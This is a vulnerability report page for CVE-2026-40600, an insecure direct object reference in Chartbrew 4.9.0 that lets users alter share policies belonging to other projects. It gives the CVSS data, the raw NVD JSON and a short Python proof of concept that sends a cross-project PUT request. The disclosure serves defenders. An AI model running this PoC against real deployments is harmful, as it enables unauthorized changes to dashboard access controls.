Security Vulnerability Report
中文
CVE-2026-40600 CVSS 8.1 HIGH

CVE-2026-40600

Published: 2026-04-30 19:16:10
Last Modified: 2026-05-01 15:31:02
Source: [email protected]

Description

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew allows authenticated users with access to one project to update or delete a SharePolicy record that belongs to a different project. The affected routes authorize the caller against the project in the URL path, but they never verify that policy_id belongs to that project. This permits cross-project modification of dashboard sharing rules, including visibility, password requirements, allowed parameters, and expiration settings. This issue has been patched in version 5.0.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Chartbrew 4.9.0
Chartbrew < 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-40600: IDOR in Chartbrew import requests target_url = "http://target.com/api/share-policies/{policy_id}" # Attacker has access to Project A, but targets a policy ID from Project B victim_policy_id = "12345-policy-id-victim" payload = { "visibility": "private", "allowedParameters": "malicious_config" } # Attacker's valid session token headers = { "Authorization": "Bearer <attacker_token>", "Content-Type": "application/json" } # Server checks project access (passed) but fails to check policy ownership response = requests.put(target_url.format(policy_id=victim_policy_id), json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful: SharePolicy updated across projects.") else: print(f"[-] Exploit failed with status: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40600", "sourceIdentifier": "[email protected]", "published": "2026-04-30T19:16:09.957", "lastModified": "2026-05-01T15:31:02.467", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. In version 4.9.0, Chartbrew allows authenticated users with access to one project to update or delete a SharePolicy record that belongs to a different project. The affected routes authorize the caller against the project in the URL path, but they never verify that policy_id belongs to that project. This permits cross-project modification of dashboard sharing rules, including visibility, password requirements, allowed parameters, and expiration settings. This issue has been patched in version 5.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/chartbrew/chartbrew/releases/tag/v5.0.0", "source": "[email protected]"}, {"url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm", "source": "[email protected]"}, {"url": "https://github.com/chartbrew/chartbrew/security/advisories/GHSA-pq8h-2h99-39xm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.